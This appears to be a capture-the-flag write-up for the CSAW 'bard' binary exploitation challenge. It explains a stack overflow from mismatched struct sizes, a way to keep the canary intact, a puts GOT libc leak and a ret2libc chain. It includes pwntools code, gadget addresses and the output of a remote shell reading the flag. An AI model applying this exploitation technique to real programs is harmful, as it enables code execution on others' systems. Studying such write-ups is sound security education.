It first asks us to initialize 10 Bards with the option of choosing their alignment (good or evil). We control the weapon and name of each bard , which are then stored on the stack .
each Bard is stored in a sort of structure on the stack … looking into it further , we see that the good and evil structs are not quite the same
since evil allocates more bytes I used them to overflow the stack but was greeted with this message …
1 2
AAAAAAAAAAAAAAAAAAAA is arrested. *** stack smashing detected ***:
we can see our canary is at the offset 488 from the start of our input and since we give 56*10 bytes we end up corrupting it. The solution is to get our canary to overlap with our input string (instead of the constant data fields of the struct) so that we can choose to not overwrite it . Placing a “good” block at the start ends up doing that for us
Okay.. so the canary’s safe but the data from the last evil struct overwrites the saved rip , lucky for us the ‘good’ allocation has its input starting from param_1 + 8 which is exactly where the saved rip will be . All we do is make a ‘good’ allocation at the end instead and give in our payload to take control of rip.
1 2
Stopped reason: SIGSEGV 0x0000414141414141 in ?? ()
perfect ! now all we need is a libc leak and a simple ret2libc will do the rest
deftrigger(payload): for i in range(1): good(1,b"A"*8) for i in range(8): evil(1,b"B"*8) good(1,payload) gdb.attach(io,brkpts) for i in range(1): zombie('r') for i in range(8): sheriff() for i in range(1): zombie('r')
#gadgets puts = 0x4006d0 pop_rdi = 0x401143 main = 0x40107b ret = 0x4006ae
The idea to get leaks was to call puts@plt using a GOT address as the argument ,Then call main again;to then which we give the payload to finally execute a ret2libc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
pwn-solo@m4chin3:~/ctf/csaw/bard$ python3 exploit.py remote [+] Opening connection to pwn.chal.csaw.io on port 5019: Done [*] base 0x7f9f7fe3a000 [*] sys 0x7f9f7fe894e0 [*] /bin/sh 0x7f9f7ffee0fa [*] Switching to interactive mode Options: (b)ribe (f)latter (r)un $ ls bard flag.txt $ cat flag.txt flag{why_4r3_th3y_4ll_such_c0w4rds??}